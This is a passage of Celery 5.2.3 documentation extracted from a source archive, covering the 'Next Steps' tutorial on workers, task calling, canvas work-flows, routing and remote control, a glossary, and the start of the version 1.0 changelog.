https://github.com/gjedeer/celery-php .. _node-celery: https://github.com/mher/node-celery .. _node-celery-ts: https://github.com/IBM/node-celery-ts What do I need? =============== .. sidebar:: Version Requirements :subtitle: Celery version 5.2 runs on - Python ❨3.7, 3.8, 3.9, 3.10❩ - PyPy3.7, 3.8 ❨7.3.7❩ Celery 4.x was the last version to support Python 2.7, Celery 5.x requires Python 3.6 or newer. Celery 5.1.x also requires Python 3.6 or newer. Celery 5.2.x requires Python 3.7 or newer. If you're running an older version of Python, you need to be running an older version of Celery: - Python 2.7 or Python 3.5: Celery series 4.4 or earlier. - Python 2.6: Celery series 3.1 or earlier. - Python 2.5: Celery series 3.0 or earlier. - Python 2.4 was Celery series 2.2 or earlier. Celery is a project with minimal funding, so we don't support Microsoft Windows. Please don't open any issues related to that platform. *Celery* requires a message transport to send and receive messages. The RabbitMQ and Redis broker transports are feature complete, but there's also support for a myriad of other experimental solutions, including using SQLite for local development. *Celery* can run on a single machine, on multiple machines, or even across data centers. Get Started =========== If this is the first time you're trying to use Celery, or if you haven't kept up with development in the 3.1 version and are coming from previous versions, then you should read our getting started tutorials: - :ref:`first-steps` - :ref:`next-steps` Celery is… ========== .. _`mailing-list`: https://groups.google.com/group/celery-users .. topic:: \ - **Simple** Celery is easy to use and maintain, and it *doesn't need configuration files*. It has an active, friendly community you can talk to for support, including a `mailing-list`_ and an :ref:`IRC channel `. Here's one of the simplest applications you can make: .. code-block:: python from celery import Celery app = Celery('hello', broker='amqp://guest@localhost//') @app.task def hello(): return 'hello world' - **Highly Available** Workers and clients will automatically retry in the event of connection loss or failure, and some brokers support HA in way of *Primary/Primary* or *Primary/Replica* replication. - **Fast** A single Celery process can process millions of tasks a minute, with sub-millisecond round-trip latency (using RabbitMQ, librabbitmq, and optimized settings). - **Flexible** Almost every part of *Celery* can be extended or used on its own, Custom pool implementations, serializers, compression schemes, logging, schedulers, consumers, producers, broker transports, and much more. .. topic:: It supports .. hlist:: :columns: 2 - **Brokers** - :ref:`RabbitMQ `, :ref:`Redis `, - :ref:`Amazon SQS `, and more… - **Concurrency** - prefork (multiprocessing), - Eventlet_, gevent_ - thread (multithreaded) - `solo` (single threaded) - **Result Stores** - AMQP, Redis - Memcached, - SQLAlchemy, Django ORM - Apache Cassandra, Elasticsearch, Riak - MongoDB, CouchDB, Couchbase, ArangoDB - Amazon DynamoDB, Amazon S3 - Microsoft Azure Block Blob, Microsoft Azure Cosmos DB - File system - **Serialization** - *pickle*, *json*, *yaml*, *msgpack*. - *zlib*, *bzip2* compression. - Cryptographic message signing. Features ======== .. topic:: \ .. hlist:: :columns: 2 - **Monitoring** A stream of monitoring events is emitted by workers and is used by built-in and external tools to tell you what your cluster is doing -- in real-time. :ref:`Read more… `. - **Work-flows** Simple and complex work-flows can be composed using a set of powerful primitives we call the "canvas", including grouping, chaining, chunking, and more. :ref:`Read more… `. - **Time & Rate Limits** You can control how many tasks can be executed per second/minute/hour, or how long a task can be allowed to run, and this can be set as a default, for a specific worker or individually for each task type. :ref:`Read more… `. - **Scheduling** You can specify the time to run a task in seconds or a :class:`~datetime.datetime`, or you can use periodic tasks for recurring events based on a simple interval, or Crontab expressions supporting minute, hour, day of week, day of month, and month of year. :ref:`Read more… `. - **Resource Leak Protection** The :option:`--max-tasks-per-child ` option is used for user tasks leaking resources, like memory or file descriptors, that are simply out of your control. :ref:`Read more… `. - **User Components** Each worker component can be customized, and additional components can be defined by the user. The worker is built up using "bootsteps" — a dependency graph enabling fine grained control of the worker's internals. .. _`Eventlet`: http://eventlet.net/ .. _`gevent`: http://gevent.org/ Framework Integration ===================== Celery is easy to integrate with web frameworks, some of them even have integration packages: +--------------------+------------------------+ | `Pyramid`_ | :pypi:`pyramid_celery` | +--------------------+------------------------+ | `Pylons`_ | :pypi:`celery-pylons` | +--------------------+------------------------+ | `Flask`_ | not needed | +--------------------+------------------------+ | `web2py`_ | :pypi:`web2py-celery` | +--------------------+------------------------+ | `Tornado`_ | :pypi:`tornado-celery` | +--------------------+------------------------+ | `Tryton`_ | :pypi:`celery_tryton` | +--------------------+------------------------+ For `Django`_ see :ref:`django-first-steps`. The integration packages aren't strictly necessary, but they can make development easier, and sometimes they add important hooks like closing database connections at :manpage:`fork(2)`. .. _`Django`: https://djangoproject.com/ .. _`Pylons`: http://pylonshq.com/ .. _`Flask`: http://flask.pocoo.org/ .. _`web2py`: http://web2py.com/ .. _`Bottle`: https://bottlepy.org/ .. _`Pyramid`: http://docs.pylonsproject.org/en/latest/docs/pyramid.html .. _`Tornado`: http://www.tornadoweb.org/ .. _`Tryton`: http://www.tryton.org/ .. _`tornado-celery`: https://github.com/mher/tornado-celery/ Quick Jump ========== .. topic:: I want to ⟶ .. hlist:: :columns: 2 - :ref:`get the return value of a task ` - :ref:`use logging from my task ` - :ref:`learn about best practices ` - :ref:`create a custom task base class ` - :ref:`add a callback to a group of tasks ` - :ref:`split a task into several chunks ` - :ref:`optimize the worker ` - :ref:`see a list of built-in task states ` - :ref:`create custom task states ` - :ref:`set a custom task name ` - :ref:`track when a task starts ` - :ref:`retry a task when it fails ` - :ref:`get the id of the current task ` - :ref:`know what queue a task was delivered to ` - :ref:`see a list of running workers ` - :ref:`purge all messages ` - :ref:`inspect what the workers are doing ` - :ref:`see what tasks a worker has registered ` - :ref:`migrate tasks to a new broker ` - :ref:`see a list of event message types ` - :ref:`contribute to Celery ` - :ref:`learn about available configuration settings ` - :ref:`get a list of people and companies using Celery ` - :ref:`write my own remote control command ` - :ref:`change worker queues at runtime ` .. topic:: Jump to ⟶ .. hlist:: :columns: 4 - :ref:`Brokers ` - :ref:`Applications ` - :ref:`Tasks ` - :ref:`Calling ` - :ref:`Workers ` - :ref:`Daemonizing ` - :ref:`Monitoring ` - :ref:`Optimizing ` - :ref:`Security ` - :ref:`Routing ` - :ref:`Configuration ` - :ref:`Django ` - :ref:`Contributing ` - :ref:`Signals ` - :ref:`FAQ ` - :ref:`API Reference ` .. include:: ../includes/installation.txt ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/getting-started/next-steps.rst0000664000175000017500000005442200000000000021605 0ustar00asifasif00000000000000.. _next-steps: ============ Next Steps ============ The :ref:`first-steps` guide is intentionally minimal. In this guide I'll demonstrate what Celery offers in more detail, including how to add Celery support for your application and library. This document doesn't document all of Celery's features and best practices, so it's recommended that you also read the :ref:`User Guide ` .. contents:: :local: :depth: 1 Using Celery in your Application ================================ .. _project-layout: Our Project ----------- Project layout:: proj/__init__.py /celery.py /tasks.py :file:`proj/celery.py` ~~~~~~~~~~~~~~~~~~~~~~ .. literalinclude:: ../../examples/next-steps/proj/celery.py :language: python In this module you created our :class:`@Celery` instance (sometimes referred to as the *app*). To use Celery within your project you simply import this instance. - The ``broker`` argument specifies the URL of the broker to use. See :ref:`celerytut-broker` for more information. - The ``backend`` argument specifies the result backend to use. It's used to keep track of task state and results. While results are disabled by default I use the RPC result backend here because I demonstrate how retrieving results work later. You may want to use a different backend for your application. They all have different strengths and weaknesses. If you don't need results, it's better to disable them. Results can also be disabled for individual tasks by setting the ``@task(ignore_result=True)`` option. See :ref:`celerytut-keeping-results` for more information. - The ``include`` argument is a list of modules to import when the worker starts. You need to add our tasks module here so that the worker is able to find our tasks. :file:`proj/tasks.py` ~~~~~~~~~~~~~~~~~~~~~ .. literalinclude:: ../../examples/next-steps/proj/tasks.py :language: python Starting the worker ------------------- The :program:`celery` program can be used to start the worker (you need to run the worker in the directory above proj): .. code-block:: console $ celery -A proj worker -l INFO When the worker starts you should see a banner and some messages:: --------------- celery@halcyon.local v4.0 (latentcall) --- ***** ----- -- ******* ---- [Configuration] - *** --- * --- . broker: amqp://guest@localhost:5672// - ** ---------- . app: __main__:0x1012d8590 - ** ---------- . concurrency: 8 (processes) - ** ---------- . events: OFF (enable -E to monitor this worker) - ** ---------- - *** --- * --- [Queues] -- ******* ---- . celery: exchange:celery(direct) binding:celery --- ***** ----- [2012-06-08 16:23:51,078: WARNING/MainProcess] celery@halcyon.local has started. -- The *broker* is the URL you specified in the broker argument in our ``celery`` module. You can also specify a different broker on the command-line by using the :option:`-b ` option. -- *Concurrency* is the number of prefork worker process used to process your tasks concurrently. When all of these are busy doing work, new tasks will have to wait for one of the tasks to finish before it can be processed. The default concurrency number is the number of CPU's on that machine (including cores). You can specify a custom number using the :option:`celery worker -c` option. There's no recommended value, as the optimal number depends on a number of factors, but if your tasks are mostly I/O-bound then you can try to increase it. Experimentation has shown that adding more than twice the number of CPU's is rarely effective, and likely to degrade performance instead. Including the default prefork pool, Celery also supports using Eventlet, Gevent, and running in a single thread (see :ref:`concurrency`). -- *Events* is an option that causes Celery to send monitoring messages (events) for actions occurring in the worker. These can be used by monitor programs like ``celery events``, and Flower -- the real-time Celery monitor, which you can read about in the :ref:`Monitoring and Management guide `. -- *Queues* is the list of queues that the worker will consume tasks from. The worker can be told to consume from several queues at once, and this is used to route messages to specific workers as a means for Quality of Service, separation of concerns, and prioritization, all described in the :ref:`Routing Guide `. You can get a complete list of command-line arguments by passing in the :option:`--help ` flag: .. code-block:: console $ celery worker --help These options are described in more detailed in the :ref:`Workers Guide `. Stopping the worker ~~~~~~~~~~~~~~~~~~~ To stop the worker simply hit :kbd:`Control-c`. A list of signals supported by the worker is detailed in the :ref:`Workers Guide `. In the background ~~~~~~~~~~~~~~~~~ In production you'll want to run the worker in the background, described in detail in the :ref:`daemonization tutorial `. The daemonization scripts uses the :program:`celery multi` command to start one or more workers in the background: .. code-block:: console $ celery multi start w1 -A proj -l INFO celery multi v4.0.0 (latentcall) > Starting nodes... > w1.halcyon.local: OK You can restart it too: .. code-block:: console $ celery multi restart w1 -A proj -l INFO celery multi v4.0.0 (latentcall) > Stopping nodes... > w1.halcyon.local: TERM -> 64024 > Waiting for 1 node..... > w1.halcyon.local: OK > Restarting node w1.halcyon.local: OK celery multi v4.0.0 (latentcall) > Stopping nodes... > w1.halcyon.local: TERM -> 64052 or stop it: .. code-block:: console $ celery multi stop w1 -A proj -l INFO The ``stop`` command is asynchronous so it won't wait for the worker to shutdown. You'll probably want to use the ``stopwait`` command instead, which ensures that all currently executing tasks are completed before exiting: .. code-block:: console $ celery multi stopwait w1 -A proj -l INFO .. note:: :program:`celery multi` doesn't store information about workers so you need to use the same command-line arguments when restarting. Only the same pidfile and logfile arguments must be used when stopping. By default it'll create pid and log files in the current directory. To protect against multiple workers launching on top of each other you're encouraged to put these in a dedicated directory: .. code-block:: console $ mkdir -p /var/run/celery $ mkdir -p /var/log/celery $ celery multi start w1 -A proj -l INFO --pidfile=/var/run/celery/%n.pid \ --logfile=/var/log/celery/%n%I.log With the multi command you can start multiple workers, and there's a powerful command-line syntax to specify arguments for different workers too, for example: .. code-block:: console $ celery multi start 10 -A proj -l INFO -Q:1-3 images,video -Q:4,5 data \ -Q default -L:4,5 debug For more examples see the :mod:`~celery.bin.multi` module in the API reference. .. _app-argument: About the :option:`--app ` argument ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The :option:`--app ` argument specifies the Celery app instance to use, in the form of ``module.path:attribute`` But it also supports a shortcut form. If only a package name is specified, it'll try to search for the app instance, in the following order: With :option:`--app=proj `: 1) an attribute named ``proj.app``, or 2) an attribute named ``proj.celery``, or 3) any attribute in the module ``proj`` where the value is a Celery application, or If none of these are found it'll try a submodule named ``proj.celery``: 4) an attribute named ``proj.celery.app``, or 5) an attribute named ``proj.celery.celery``, or 6) Any attribute in the module ``proj.celery`` where the value is a Celery application. This scheme mimics the practices used in the documentation -- that is, ``proj:app`` for a single contained module, and ``proj.celery:app`` for larger projects. .. _calling-tasks: Calling Tasks ============= You can call a task using the :meth:`delay` method: .. code-block:: pycon >>> from proj.tasks import add >>> add.delay(2, 2) This method is actually a star-argument shortcut to another method called :meth:`apply_async`: .. code-block:: pycon >>> add.apply_async((2, 2)) The latter enables you to specify execution options like the time to run (countdown), the queue it should be sent to, and so on: .. code-block:: pycon >>> add.apply_async((2, 2), queue='lopri', countdown=10) In the above example the task will be sent to a queue named ``lopri`` and the task will execute, at the earliest, 10 seconds after the message was sent. Applying the task directly will execute the task in the current process, so that no message is sent: .. code-block:: pycon >>> add(2, 2) 4 These three methods - :meth:`delay`, :meth:`apply_async`, and applying (``__call__``), make up the Celery calling API, which is also used for signatures. A more detailed overview of the Calling API can be found in the :ref:`Calling User Guide `. Every task invocation will be given a unique identifier (an UUID) -- this is the task id. The ``delay`` and ``apply_async`` methods return an :class:`~@AsyncResult` instance, which can be used to keep track of the tasks execution state. But for this you need to enable a :ref:`result backend ` so that the state can be stored somewhere. Results are disabled by default because there is no result backend that suits every application; to choose one you need to consider the drawbacks of each individual backend. For many tasks keeping the return value isn't even very useful, so it's a sensible default to have. Also note that result backends aren't used for monitoring tasks and workers: for that Celery uses dedicated event messages (see :ref:`guide-monitoring`). If you have a result backend configured you can retrieve the return value of a task: .. code-block:: pycon >>> res = add.delay(2, 2) >>> res.get(timeout=1) 4 You can find the task's id by looking at the :attr:`id` attribute: .. code-block:: pycon >>> res.id d6b3aea2-fb9b-4ebc-8da4-848818db9114 You can also inspect the exception and traceback if the task raised an exception, in fact ``result.get()`` will propagate any errors by default: .. code-block:: pycon >>> res = add.delay(2, '2') >>> res.get(timeout=1) .. code-block:: pytb Traceback (most recent call last): File "", line 1, in File "celery/result.py", line 221, in get return self.backend.wait_for_pending( File "celery/backends/asynchronous.py", line 195, in wait_for_pending return result.maybe_throw(callback=callback, propagate=propagate) File "celery/result.py", line 333, in maybe_throw self.throw(value, self._to_remote_traceback(tb)) File "celery/result.py", line 326, in throw self.on_ready.throw(*args, **kwargs) File "vine/promises.py", line 244, in throw reraise(type(exc), exc, tb) File "vine/five.py", line 195, in reraise raise value TypeError: unsupported operand type(s) for +: 'int' and 'str' If you don't wish for the errors to propagate, you can disable that by passing ``propagate``: .. code-block:: pycon >>> res.get(propagate=False) TypeError("unsupported operand type(s) for +: 'int' and 'str'") In this case it'll return the exception instance raised instead -- so to check whether the task succeeded or failed, you'll have to use the corresponding methods on the result instance: .. code-block:: pycon >>> res.failed() True >>> res.successful() False So how does it know if the task has failed or not? It can find out by looking at the tasks *state*: .. code-block:: pycon >>> res.state 'FAILURE' A task can only be in a single state, but it can progress through several states. The stages of a typical task can be:: PENDING -> STARTED -> SUCCESS The started state is a special state that's only recorded if the :setting:`task_track_started` setting is enabled, or if the ``@task(track_started=True)`` option is set for the task. The pending state is actually not a recorded state, but rather the default state for any task id that's unknown: this you can see from this example: .. code-block:: pycon >>> from proj.celery import app >>> res = app.AsyncResult('this-id-does-not-exist') >>> res.state 'PENDING' If the task is retried the stages can become even more complex. To demonstrate, for a task that's retried two times the stages would be: .. code-block:: text PENDING -> STARTED -> RETRY -> STARTED -> RETRY -> STARTED -> SUCCESS To read more about task states you should see the :ref:`task-states` section in the tasks user guide. Calling tasks is described in detail in the :ref:`Calling Guide `. .. _designing-workflows: *Canvas*: Designing Work-flows ============================== You just learned how to call a task using the tasks ``delay`` method, and this is often all you need. But sometimes you may want to pass the signature of a task invocation to another process or as an argument to another function, for which Celery uses something called *signatures*. A signature wraps the arguments and execution options of a single task invocation in such a way that it can be passed to functions or even serialized and sent across the wire. You can create a signature for the ``add`` task using the arguments ``(2, 2)``, and a countdown of 10 seconds like this: .. code-block:: pycon >>> add.signature((2, 2), countdown=10) tasks.add(2, 2) There's also a shortcut using star arguments: .. code-block:: pycon >>> add.s(2, 2) tasks.add(2, 2) And there's that calling API again… ----------------------------------- Signature instances also support the calling API, meaning they have ``delay`` and ``apply_async`` methods. But there's a difference in that the signature may already have an argument signature specified. The ``add`` task takes two arguments, so a signature specifying two arguments would make a complete signature: .. code-block:: pycon >>> s1 = add.s(2, 2) >>> res = s1.delay() >>> res.get() 4 But, you can also make incomplete signatures to create what we call *partials*: .. code-block:: pycon # incomplete partial: add(?, 2) >>> s2 = add.s(2) ``s2`` is now a partial signature that needs another argument to be complete, and this can be resolved when calling the signature: .. code-block:: pycon # resolves the partial: add(8, 2) >>> res = s2.delay(8) >>> res.get() 10 Here you added the argument 8 that was prepended to the existing argument 2 forming a complete signature of ``add(8, 2)``. Keyword arguments can also be added later; these are then merged with any existing keyword arguments, but with new arguments taking precedence: .. code-block:: pycon >>> s3 = add.s(2, 2, debug=True) >>> s3.delay(debug=False) # debug is now False. As stated, signatures support the calling API: meaning that - ``sig.apply_async(args=(), kwargs={}, **options)`` Calls the signature with optional partial arguments and partial keyword arguments. Also supports partial execution options. - ``sig.delay(*args, **kwargs)`` Star argument version of ``apply_async``. Any arguments will be prepended to the arguments in the signature, and keyword arguments is merged with any existing keys. So this all seems very useful, but what can you actually do with these? To get to that I must introduce the canvas primitives… The Primitives -------------- .. topic:: \ .. hlist:: :columns: 2 - :ref:`group ` - :ref:`chain ` - :ref:`chord ` - :ref:`map ` - :ref:`starmap ` - :ref:`chunks ` These primitives are signature objects themselves, so they can be combined in any number of ways to compose complex work-flows. .. note:: These examples retrieve results, so to try them out you need to configure a result backend. The example project above already does that (see the backend argument to :class:`~celery.Celery`). Let's look at some examples: Groups ~~~~~~ A :class:`~celery.group` calls a list of tasks in parallel, and it returns a special result instance that lets you inspect the results as a group, and retrieve the return values in order. .. code-block:: pycon >>> from celery import group >>> from proj.tasks import add >>> group(add.s(i, i) for i in range(10))().get() [0, 2, 4, 6, 8, 10, 12, 14, 16, 18] - Partial group .. code-block:: pycon >>> g = group(add.s(i) for i in range(10)) >>> g(10).get() [10, 11, 12, 13, 14, 15, 16, 17, 18, 19] Chains ~~~~~~ Tasks can be linked together so that after one task returns the other is called: .. code-block:: pycon >>> from celery import chain >>> from proj.tasks import add, mul # (4 + 4) * 8 >>> chain(add.s(4, 4) | mul.s(8))().get() 64 or a partial chain: .. code-block:: pycon >>> # (? + 4) * 8 >>> g = chain(add.s(4) | mul.s(8)) >>> g(4).get() 64 Chains can also be written like this: .. code-block:: pycon >>> (add.s(4, 4) | mul.s(8))().get() 64 Chords ~~~~~~ A chord is a group with a callback: .. code-block:: pycon >>> from celery import chord >>> from proj.tasks import add, xsum >>> chord((add.s(i, i) for i in range(10)), xsum.s())().get() 90 A group chained to another task will be automatically converted to a chord: .. code-block:: pycon >>> (group(add.s(i, i) for i in range(10)) | xsum.s())().get() 90 Since these primitives are all of the signature type they can be combined almost however you want, for example: .. code-block:: pycon >>> upload_document.s(file) | group(apply_filter.s() for filter in filters) Be sure to read more about work-flows in the :ref:`Canvas ` user guide. Routing ======= Celery supports all of the routing facilities provided by AMQP, but it also supports simple routing where messages are sent to named queues. The :setting:`task_routes` setting enables you to route tasks by name and keep everything centralized in one location: .. code-block:: python app.conf.update( task_routes = { 'proj.tasks.add': {'queue': 'hipri'}, }, ) You can also specify the queue at runtime with the ``queue`` argument to ``apply_async``: .. code-block:: pycon >>> from proj.tasks import add >>> add.apply_async((2, 2), queue='hipri') You can then make a worker consume from this queue by specifying the :option:`celery worker -Q` option: .. code-block:: console $ celery -A proj worker -Q hipri You may specify multiple queues by using a comma-separated list. For example, you can make the worker consume from both the default queue and the ``hipri`` queue, where the default queue is named ``celery`` for historical reasons: .. code-block:: console $ celery -A proj worker -Q hipri,celery The order of the queues doesn't matter as the worker will give equal weight to the queues. To learn more about routing, including taking use of the full power of AMQP routing, see the :ref:`Routing Guide `. Remote Control ============== If you're using RabbitMQ (AMQP), Redis, or Qpid as the broker then you can control and inspect the worker at runtime. For example you can see what tasks the worker is currently working on: .. code-block:: console $ celery -A proj inspect active This is implemented by using broadcast messaging, so all remote control commands are received by every worker in the cluster. You can also specify one or more workers to act on the request using the :option:`--destination ` option. This is a comma-separated list of worker host names: .. code-block:: console $ celery -A proj inspect active --destination=celery@example.com If a destination isn't provided then every worker will act and reply to the request. The :program:`celery inspect` command contains commands that don't change anything in the worker; it only returns information and statistics about what's going on inside the worker. For a list of inspect commands you can execute: .. code-block:: console $ celery -A proj inspect --help Then there's the :program:`celery control` command, which contains commands that actually change things in the worker at runtime: .. code-block:: console $ celery -A proj control --help For example you can force workers to enable event messages (used for monitoring tasks and workers): .. code-block:: console $ celery -A proj control enable_events When events are enabled you can then start the event dumper to see what the workers are doing: .. code-block:: console $ celery -A proj events --dump or you can start the curses interface: .. code-block:: console $ celery -A proj events when you're finished monitoring you can disable events again: .. code-block:: console $ celery -A proj control disable_events The :program:`celery status` command also uses remote control commands and shows a list of online workers in the cluster: .. code-block:: console $ celery -A proj status You can read more about the :program:`celery` command and monitoring in the :ref:`Monitoring Guide `. Timezone ======== All times and dates, internally and in messages use the UTC timezone. When the worker receives a message, for example with a countdown set it converts that UTC time to local time. If you wish to use a different timezone than the system timezone then you must configure that using the :setting:`timezone` setting: .. code-block:: python app.conf.timezone = 'Europe/London' Optimization ============ The default configuration isn't optimized for throughput. By default, it tries to walk the middle way between many short tasks and fewer long tasks, a compromise between throughput and fair scheduling. If you have strict fair scheduling requirements, or want to optimize for throughput then you should read the :ref:`Optimizing Guide `. What to do now? =============== Now that you have read this document you should continue to the :ref:`User Guide `. There's also an :ref:`API reference ` if you're so inclined. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/getting-started/resources.rst0000664000175000017500000000020400000000000021472 0ustar00asifasif00000000000000.. _resources: =========== Resources =========== .. contents:: :local: :depth: 2 .. include:: ../includes/resources.txt ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/glossary.rst0000664000175000017500000001054000000000000016222 0ustar00asifasif00000000000000.. _glossary: Glossary ======== .. glossary:: :sorted: acknowledged Workers acknowledge messages to signify that a message has been handled. Failing to acknowledge a message will cause the message to be redelivered. Exactly when a transaction is considered a failure varies by transport. In AMQP the transaction fails when the connection/channel is closed (or lost), but in Redis/SQS the transaction times out after a configurable amount of time (the ``visibility_timeout``). ack Short for :term:`acknowledged`. early acknowledgment Task is :term:`acknowledged` just-in-time before being executed, meaning the task won't be redelivered to another worker if the machine loses power, or the worker instance is abruptly killed, mid-execution. Configured using :setting:`task_acks_late`. late acknowledgment Task is :term:`acknowledged` after execution (both if successful, or if the task is raising an error), which means the task will be redelivered to another worker in the event of the machine losing power, or the worker instance being killed mid-execution. Configured using :setting:`task_acks_late`. early ack Short for :term:`early acknowledgment` late ack Short for :term:`late acknowledgment` ETA "Estimated Time of Arrival", in Celery and Google Task Queue, etc., used as the term for a delayed message that should not be processed until the specified ETA time. See :ref:`calling-eta`. request Task messages are converted to *requests* within the worker. The request information is also available as the task's :term:`context` (the ``task.request`` attribute). calling Sends a task message so that the task function is :term:`executed ` by a worker. kombu Python messaging library used by Celery to send and receive messages. billiard Fork of the Python multiprocessing library containing improvements required by Celery. executing Workers *execute* task :term:`requests `. apply Originally a synonym to :term:`call ` but used to signify that a function is executed by the current process. context The context of a task contains information like the id of the task, it's arguments and what queue it was delivered to. It can be accessed as the tasks ``request`` attribute. See :ref:`task-request-info` idempotent Idempotence is a mathematical property that describes a function that can be called multiple times without changing the result. Practically it means that a function can be repeated many times without unintended effects, but not necessarily side-effect free in the pure sense (compare to :term:`nullipotent`). Further reading: https://en.wikipedia.org/wiki/Idempotent nullipotent describes a function that'll have the same effect, and give the same result, even if called zero or multiple times (side-effect free). A stronger version of :term:`idempotent`. reentrant describes a function that can be interrupted in the middle of execution (e.g., by hardware interrupt or signal), and then safely called again later. Reentrancy isn't the same as :term:`idempotence ` as the return value doesn't have to be the same given the same inputs, and a reentrant function may have side effects as long as it can be interrupted; An idempotent function is always reentrant, but the reverse may not be true. cipater Celery release 3.1 named after song by Autechre (http://www.youtube.com/watch?v=OHsaqUr_33Y) prefetch multiplier The :term:`prefetch count` is configured by using the :setting:`worker_prefetch_multiplier` setting, which is multiplied by the number of pool slots (threads/processes/greenthreads). `prefetch count` Maximum number of unacknowledged messages a consumer can hold and if exceeded the transport shouldn't deliver any more messages to that consumer. See :ref:`optimizing-prefetch-limit`. pidbox A process mailbox, used to implement remote control commands. ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.5997531 celery-5.2.3/docs/history/0000775000175000017500000000000000000000000015326 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/history/changelog-1.0.rst0000664000175000017500000016136700000000000020321 0ustar00asifasif00000000000000.. _changelog-1.0: =============================== Change history for Celery 1.0 =============================== .. contents:: :local: .. _version-1.0.6: 1.0.6 ===== :release-date: 2010-06-30 09:57 a.m. CEST :release-by: Ask Solem * RabbitMQ 1.8.0 has extended their exchange equivalence tests to include `auto_delete` and `durable`. This broke the AMQP backend. If you've already used the AMQP backend this means you have to delete the previous definitions: .. code-block:: console $ camqadm exchange.delete celeryresults or: .. code-block:: console $ python manage.py camqadm exchange.delete celeryresults .. _version-1.0.5: 1.0.5 ===== :release-date: 2010-06-01 02:36 p.m. CEST :release-by: Ask Solem .. _v105-critical: Critical -------- * :sig:`INT`/:kbd:`Control-c` killed the pool, abruptly terminating the currently executing tasks. Fixed by making the pool worker processes ignore :const:`SIGINT`. * Shouldn't close the consumers before the pool is terminated, just cancel the consumers. See issue #122. * Now depends on :pypi:`billiard` >= 0.3.1 * worker: Previously exceptions raised by worker components could stall start-up, now it correctly logs the exceptions and shuts down. * worker: Prefetch counts was set too late. QoS is now set as early as possible, so the worker: can't slurp in all the messages at start-up. .. _v105-changes: Changes ------- * :mod:`celery.contrib.abortable`: Abortable tasks. Tasks that defines steps of execution, the task can then be aborted after each step has completed. * :class:`~celery.events.EventDispatcher`: No longer creates AMQP channel if events are disabled * Added required RPM package names under `[bdist_rpm]` section, to support building RPMs from the sources using :file:`setup.py`. * Running unit tests: :envvar:`NOSE_VERBOSE` environment var now enables verbose output from Nose. * :func:`celery.execute.apply`: Pass log file/log level arguments as task kwargs. See issue #110. * celery.execute.apply: Should return exception, not :class:`~billiard.einfo.ExceptionInfo` on error. See issue #111. * Added new entries to the :ref:`FAQs `: * Should I use retry or acks_late? * Can I call a task by name? .. _version-1.0.4: 1.0.4 ===== :release-date: 2010-05-31 09:54 a.m. CEST :release-by: Ask Solem * Changelog merged with 1.0.5 as the release was never announced. .. _version-1.0.3: 1.0.3 ===== :release-date: 2010-05-15 03:00 p.m. CEST :release-by: Ask Solem .. _v103-important: Important notes --------------- * Messages are now acknowledged *just before* the task function is executed. This is the behavior we've wanted all along, but couldn't have because of limitations in the multiprocessing module. The previous behavior wasn't good, and the situation worsened with the release of 1.0.1, so this change will definitely improve reliability, performance and operations in general. For more information please see http://bit.ly/9hom6T * Database result backend: result now explicitly sets `null=True` as `django-picklefield` version 0.1.5 changed the default behavior right under our noses :( See: http://bit.ly/d5OwMr This means those who created their Celery tables (via ``syncdb`` or ``celeryinit``) with :pypi:`django-picklefield`` versions >= 0.1.5 has to alter their tables to allow the result field to be `NULL` manually. MySQL: .. code-block:: sql ALTER TABLE celery_taskmeta MODIFY result TEXT NULL PostgreSQL: .. code-block:: sql ALTER TABLE celery_taskmeta ALTER COLUMN result DROP NOT NULL * Removed `Task.rate_limit_queue_type`, as it wasn't really useful and made it harder to refactor some parts. * Now depends on carrot >= 0.10.4 * Now depends on billiard >= 0.3.0 .. _v103-news: News ---- * AMQP backend: Added timeout support for `result.get()` / `result.wait()`. * New task option: `Task.acks_late` (default: :setting:`CELERY_ACKS_LATE`) Late ack means the task messages will be acknowledged **after** the task has been executed, not *just before*, which is the default behavior. .. note:: This means the tasks may be executed twice if the worker crashes in mid-execution. Not acceptable for most applications, but desirable for others. * Added Crontab-like scheduling to periodic tasks. Like a cronjob, you can specify units of time of when you'd like the task to execute. While not a full implementation of :command:`cron`'s features, it should provide a fair degree of common scheduling needs. You can specify a minute (0-59), an hour (0-23), and/or a day of the week (0-6 where 0 is Sunday, or by names: ``sun, mon, tue, wed, thu, fri, sat``). Examples: .. code-block:: python from celery.schedules import crontab from celery.decorators import periodic_task @periodic_task(run_every=crontab(hour=7, minute=30)) def every_morning(): print('Runs every morning at 7:30a.m') @periodic_task(run_every=crontab(hour=7, minute=30, day_of_week='mon')) def every_monday_morning(): print('Run every monday morning at 7:30a.m') @periodic_task(run_every=crontab(minutes=30)) def every_hour(): print('Runs every hour on the clock (e.g., 1:30, 2:30, 3:30 etc.).') .. note:: This a late addition. While we have unit tests, due to the nature of this feature we haven't been able to completely test this in practice, so consider this experimental. * `TaskPool.apply_async`: Now supports the `accept_callback` argument. * `apply_async`: Now raises :exc:`ValueError` if task args isn't a list, or kwargs isn't a tuple (Issue #95). * `Task.max_retries` can now be `None`, which means it will retry forever. * ``celerybeat``: Now reuses the same connection when publishing large sets of tasks. * Modified the task locking example in the documentation to use `cache.add` for atomic locking. * Added experimental support for a *started* status on tasks. If `Task.track_started` is enabled the task will report its status as "started" when the task is executed by a worker. The default value is `False` as the normal behavior is to not report that level of granularity. Tasks are either pending, finished, or waiting to be retried. Having a "started" status can be useful for when there are long running tasks and there's a need to report which task is currently running. The global default can be overridden by the :setting:`CELERY_TRACK_STARTED` setting. * User Guide: New section `Tips and Best Practices`. Contributions welcome! .. _v103-remote-control: Remote control commands ----------------------- * Remote control commands can now send replies back to the caller. Existing commands has been improved to send replies, and the client interface in `celery.task.control` has new keyword arguments: `reply`, `timeout` and `limit`. Where reply means it will wait for replies, timeout is the time in seconds to stop waiting for replies, and limit is the maximum number of replies to get. By default, it will wait for as many replies as possible for one second. * rate_limit(task_name, destination=all, reply=False, timeout=1, limit=0) Worker returns `{'ok': message}` on success, or `{'failure': message}` on failure. >>> from celery.task.control import rate_limit >>> rate_limit('tasks.add', '10/s', reply=True) [{'worker1': 